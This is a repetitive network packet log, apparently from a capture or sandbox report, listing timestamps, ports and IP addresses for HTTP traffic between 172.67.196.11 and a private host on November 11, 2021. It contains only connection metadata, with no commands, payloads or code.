Nov 11, 2021 20:35:49.148277044 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.148296118 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.148327112 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.148351908 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.148354053 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.148376942 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.148402929 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.148426056 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.148448944 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.148468018 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.148482084 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.148485899 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.148509026 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.148525000 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.148541927 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.148562908 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.148581028 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.148597002 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.148617029 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.148642063 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.148605108 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.148668051 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.148684025 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.148689985 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.148689985 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.148695946 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.148708105 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.148725033 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.148739100 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.148742914 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.148750067 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.148802042 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.148819923 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.148837090 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.148838043 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.148848057 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.148874044 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.148890972 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.148910999 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.148929119 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.148947001 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.148951054 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.148960114 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.148964882 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.149080992 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.149084091 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.149113894 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.149132013 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.149146080 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.149147034 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.149169922 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.149188042 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.149205923 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.149221897 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.149239063 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.149243116 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.149250984 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.149255037 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.149277925 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.149295092 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.149317980 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.149333954 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.149334908 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.149343967 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.149353027 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.149368048 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.149419069 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.149424076 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.149436951 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.149457932 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.149457932 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.149463892 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.149476051 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.149498940 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.149514914 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.149537086 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.149553061 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.149557114 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.149569035 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.149586916 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.149604082 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.149621010 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.149637938 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.149652958 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.149657965 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.149666071 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.149671078 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.149694920 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.149710894 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.149713993 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.149720907 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.149728060 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.149749994 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.149766922 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.149782896 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.149794102 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.149797916 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.149818897 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.149835110 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.149837971 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.149846077 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.149848938 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.149905920 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.150021076 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.150039911 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.150059938 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.150078058 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.150094986 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.150105000 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.150111914 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.150113106 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.150134087 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.150151968 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.150172949 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.150190115 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.150192976 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.150201082 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.150207996 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.150228024 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.150244951 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.150262117 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.150271893 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.150279045 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.150300026 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.150316954 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.150343895 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.150350094 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.150360107 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.150360107 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.150382996 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.150399923 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.150413990 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.150418043 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.150423050 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.150434971 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.150458097 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.150475979 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.150492907 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.150499105 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.150509119 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.150510073 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.150530100 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.150547028 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.150563955 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.150567055 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.150573969 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.150580883 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.150603056 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.150619984 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.150635958 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.150635958 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.150652885 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.150676012 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.150692940 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.150707960 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.150726080 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.150733948 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.150743008 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.150746107 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.150764942 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.150784016 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.150962114 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.150971889 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.150978088 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.150995016 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.151016951 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.151034117 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.151056051 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.151072979 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.151092052 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.151108027 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.151124001 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.151139975 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.151161909 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.151180029 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.151201963 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.151220083 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.151223898 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.151232958 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.151237965 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.151257038 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.151278973 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.151303053 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.151320934 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.151343107 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.151360035 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.151381969 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.151400089 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.151400089 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.151407957 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.151417971 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.151438951 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.151456118 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.151477098 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.151493073 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.151509047 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.151530027 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.151546955 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.151547909 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.151571989 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.151576996 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.151585102 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.151587963 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.151592970 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.151607037 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.151623964 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.151640892 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.151660919 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.151678085 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.151695013 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.151701927 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.151711941 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.151712894 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.151717901 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.151732922 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.151757002 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.151813030 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.151823044 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.151884079 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.151906013 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.151927948 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.151946068 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.151967049 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.151983976 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.152005911 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.152024984 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.152043104 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.152050972 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.152061939 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.152065039 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.152067900 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.152081966 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.152103901 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.152117968 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.152121067 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.152143002 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.152146101 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.152160883 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.152182102 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.152195930 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.152199984 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.152220964 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.152239084 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.152255058 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.152276993 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.152282953 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.152291059 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.152292967 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.152296066 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.152316093 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.152333975 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.152350903 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.152367115 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.152383089 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.152384043 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.152395010 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.152400970 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.152421951 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.152437925 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.152441978 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.152451038 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.152453899 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.152473927 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.152489901 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.152507067 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.152523994 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.152539968 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.152549028 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.152555943 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.152559042 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.152576923 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.152592897 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.152594090 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.152601004 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.152610064 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.152630091 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.152637959 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.152645111 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.152695894 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.152817965 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.152834892 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.152887106 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.152904987 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.152921915 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.152937889 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.152956963 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.152961016 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.152966022 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.152978897 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.153002024 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.153017998 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.153038979 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.153038979 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.153048038 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.153055906 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.153076887 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.153093100 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.153112888 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.153115034 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.153120995 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.153131962 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.153151035 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.153167009 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.153172970 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.153173923 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.153191090 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.153213024 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.153230906 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.153250933 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.153254986 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.153259993 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.153270960 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.153294086 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.153311014 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.153326988 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.153327942 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.153337002 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.153343916 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.153361082 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.153377056 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.153393030 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.153407097 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.153409004 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.153414965 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.153424978 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.153445959 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.153450966 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.153461933 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.153481960 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.153486013 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.153508902 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.153532028 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.153549910 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.153554916 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.153563976 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.153564930 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.153583050 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.153600931 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.153603077 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.153620005 CET	80	49751	172.67.196.11	192.168.2.3
